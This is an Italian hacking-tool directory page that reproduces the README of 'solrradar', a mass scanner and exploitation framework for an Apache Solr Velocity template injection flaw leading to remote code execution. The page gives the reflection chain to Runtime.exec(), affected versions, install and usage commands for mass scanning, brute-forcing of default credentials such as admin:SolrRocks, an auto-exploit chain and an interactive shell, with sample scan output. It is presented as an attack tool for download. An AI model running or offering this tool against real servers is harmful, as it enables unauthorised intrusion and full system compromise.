Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
solrradar — ☄️ Framework di ricognizione e sfruttamento di massa per Apache Solr CVE-2026-44825 — Iniezione di template Velocity a RCE | Kitploit
Strumenti/GitHubGitHub/shinthink/solrradar
RicognizioneScanner di VulnerabilitàAttacchi alle PasswordExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHub
51542 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
shinthink/solrradar

solrradar

☄️ Framework di ricognizione e sfruttamento di massa per Apache Solr CVE-2026-44825 — Iniezione di template Velocity a RCE

Vedi Repository
Condividi

SolrRadar — CVE-2026-44825 Scanner Apache Solr

Python CVE License

Threads Version Brute RCE Shell

Framework di Ricognizione di Massa & Exploitation per Apache Solr

Velocity Template Injection → Esecuzione di Codice Remoto



📑 Indice

  • Panoramica della Vulnerabilità
  • Versioni Affette
  • Funzionalità
  • Installazione
  • Utilizzo
  • Prova di Concetto
  • Approfondimento Tecnico
  • Metodologia di Rilevamento
  • Difesa & Mitigazione
  • Disclaimer
  • Riferimenti

🔴 Panoramica della Vulnerabilità

CVE-2026-44825 è una vulnerabilità di gravità critica in Apache Solr che consente agli aggressori di ottenere Esecuzione di Codice Remoto (RCE) non autenticata tramite injection di template Velocity.

Il Problema

L'endpoint /select di Apache Solr accetta un parametro wt=velocity che renderizza template Velocity forniti dall'utente. Quando il Velocity Response Writer è abilitato (o può essere abilitato tramite API di configurazione), un aggressore può iniettare un template dannoso che chiama java.lang.Runtime.exec(), eseguendo comandi arbitrari del sistema con i privilegi del processo Solr.

Impatto

VettoreGravitàImpatto
RCE non autenticata9.8 (Critica)Compromissione completa del sistema
RCE autenticata8.8 (Alta)Esecuzione di codice post-autenticazione
Divulgazione di informazioni5.3 (Media)Enumerazione di core/collezioni

Il Motore di Template Velocity

Apache Solr include Apache Velocity come motore di template opzionale per il rendering delle risposte. La vulnerabilità risiede nel VelocityResponseWriter di Solr che elabora i parametri template controllati dall'utente senza un'adeguata sanificazione, consentendo l'invocazione diretta delle API di reflection di Java:

Catena di Reflection Java:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)

🟠 Versioni Affette

Versione Apache SolrStatoNote
9.4.0 – 9.10.1🔴 VulnerabileSfruttamento attivo in natura
10.0.0🔴 VulnerabileVersione iniziale 10.x affetta
10.0.1+🟢 CorrettaFix backportato
9.10.2+🟢 CorrettaPatch disponibile
≤ 9.3.x🟢 Non AffettaVelocity Response Writer non presente
8.x (tutte)🟢 Non AffettaNessun supporto Velocity

Nota: I controlli di versione vengono eseguiti automaticamente analizzando la risposta JSON di /admin/info/system.


✨ Funzionalità

🔍 Ricognizione

  • Scansione multi-target — 30 thread concorrenti, configurabili
  • Fingerprinting delle versioni — Estrazione esatta delle versioni Solr e Lucene
  • Rilevamento dual-mode — SolrCloud + Standalone (singolo nodo)
  • Sondaggio con autenticazione — Test di 3 endpoint admin per Basic Auth
  • Enumerazione delle collezioni — Elenca collezioni/core senza autenticazione quando possibile

💀 Exploitation

  • Brute-force delle credenziali — Dizionario integrato delle credenziali Solr predefinite
  • RCE Velocity — Iniezione di template tramite java.lang.Runtime.exec()
  • Shell interattiva — Pseudo-terminale per comandi post-exploitation
  • Catena di auto-exploit — Rileva → brute → RCE in un unico comando
  • Esportazione JSON — Output strutturato per l'integrazione con altri strumenti

📦 Installazione

# Clona il repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar

# Installa le dipendenze
pip install -r requirements.txt

# Verifica
python solr_scanner.py --help

Requisiti

requests>=2.28.0
urllib3>=1.26.0

Solo librerie standard + requests. Nessuna dipendenza esotica.


📖 Utilizzo

Argomenti da Riga di Comando

Scanner Apache Solr CVE-2026-44825

  -t, --target     URL singolo target o IP[:porta]
  -f, --file       File contenente i target (uno per riga, # per commenti)
  --exploit        Auto-exploit se vengono trovate credenziali vulnerabili
  --rce            Avvia shell interattiva dopo l'autenticazione
  -u, --user       Nome utente per Basic Auth
  -pw, --password  Password per Basic Auth
  -o, --output     Percorso file output JSON          (default: solr_results.json)
  -w, --workers    Numero di thread concorrenti       (default: 30)
  -T, --timeout    Timeout richieste HTTP (secondi)    (default: 8)

Scansione di Base

# Singolo target
python solr_scanner.py -t 192.168.1.100:8983

# Singolo target con percorso personalizzato
python solr_scanner.py -t http://example.com/solr

# Scansione di massa da file
python solr_scanner.py -f targets.txt -o results.json

Formato del File dei Target

# targets.txt — supporta commenti e righe vuote
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24          # (CIDR non supportato; espandere con strumento esterno)

Exploitation

# Scansiona + auto-exploit se trovate credenziali
python solr_scanner.py -f targets.txt --exploit

# Credenziali note + shell interattiva
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks

# Brute-force automatico + shell in caso di successo
python solr_scanner.py -t target:8983 --rce

🧪 Prova di Concetto

Scenario 1: Rilevamento & Fingerprinting delle Versioni

$ python solr_scanner.py -f targets.txt
Scanner Apache Solr CVE-2026-44825

Target: 3 | Thread: 30 | Timeout: 8s
Scansione in corso...

[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
    Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr

Fatto. Totale:3 | Solr:3 | Vuln:1

Tutti e 3 i target rilevati. L'istanza 9.4.1 è contrassegnata come vulnerabile con Basic Auth abilitato.


Scenario 2: Brute-Force delle Credenziali

$ python solr_scanner.py -t solr-target.internal
Scanner Apache Solr CVE-2026-44825

[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
    [!] admin:SolrRocks
    Cols: ['cms', 'users', 'search', 'analytics']

La credenziale predefinita admin:SolrRocks concede l'accesso alle API admin di Solr. Quattro collezioni scoperte.


Scenario 3: RCE Autenticata tramite Iniezione Velocity

Scarica lo strumento